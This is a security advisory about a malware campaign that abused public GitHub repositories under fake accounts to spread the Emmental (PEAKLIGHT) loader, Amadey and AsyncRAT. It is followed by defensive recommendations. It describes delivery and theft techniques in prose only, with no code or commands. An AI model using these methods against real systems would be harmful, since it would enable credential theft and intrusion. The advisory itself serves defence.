New malware campaign uses GitHub repositories

Description

 

A new malware campaign has been detected in which malicious actors are using public GitHub repositories as infrastructure to distribute malware, taking advantage of the trust associated with these legitimate platforms. The campaign focuses on spreading the Emmental loader, which subsequently downloads trojans such as Amadey and remote access tools (RATs).

 

Technical Details

 

A malicious campaign has been uncovered in which threat actors are using public GitHub repositories to host and distribute the loader known as Emmental (also identified as PEAKLIGHT). This tool is responsible for downloading and executing malware like Amadey, a trojan primarily focused on information theft and acting as a dropper (loader) for other threats. The actors created multiple fake GitHub accounts with names such as Legendary99999, DFfe9ewf, Milidmdds, and bruhbruh9999, and uploaded malicious binaries disguised as legitimate software. These files were presented as plugins or useful tools but actually contained secondary payloads such as information stealers and RATs like AsyncRAT. Although the repositories have been taken down by GitHub, the technique demonstrates how attackers exploit legitimate platforms to evade detection by traditional security solutions.

 

The Emmental loader not only downloads Amadey directly from GitHub but also uses PowerShell scripts and malicious versions of popular applications like PuTTY to execute payloads. In some cases, the PowerShell scripts download malicious content from hardcoded IP addresses, allowing attackers to maintain control over the infection chain. Additionally, a Python-written variant of the Emmental loader was observed, featuring similar logic for malware download and execution. These loaders not only delivered Amadey but also additional modules designed to capture screenshots, collect browser credentials, and steal data from Telegram or VPN applications.

 

Recommendations

 

Protection

 

• Use security tools (Antivirus, EDR, etc.) capable of detecting suspicious behavior.
• Maintain an up-to-date inventory of all assets.
• Conduct employee awareness campaigns on proper information handling.
• Limit the use of external storage devices.
• Deploy Data Loss Prevention (DLP) systems to prevent information leakage.
• Restrict the use of browser extensions, as they may be exploited by attackers for data exfiltration.

 

Detection

 

• Analyze temporary files and system folders (e.g., %System32%) for malicious files.
• Monitor active processes and services for unusual behavior.
• Inspect the machine’s network traffic for suspicious communications (e.g., active sessions, NetBIOS connections).
• Examine scheduled tasks on the systems.

 

Mitigation

 

• Isolate compromised devices to prevent malware from spreading across the network.

 

References

 

https://thehackernews.com/2025/07/hackers-use-github-repositories-to-host.html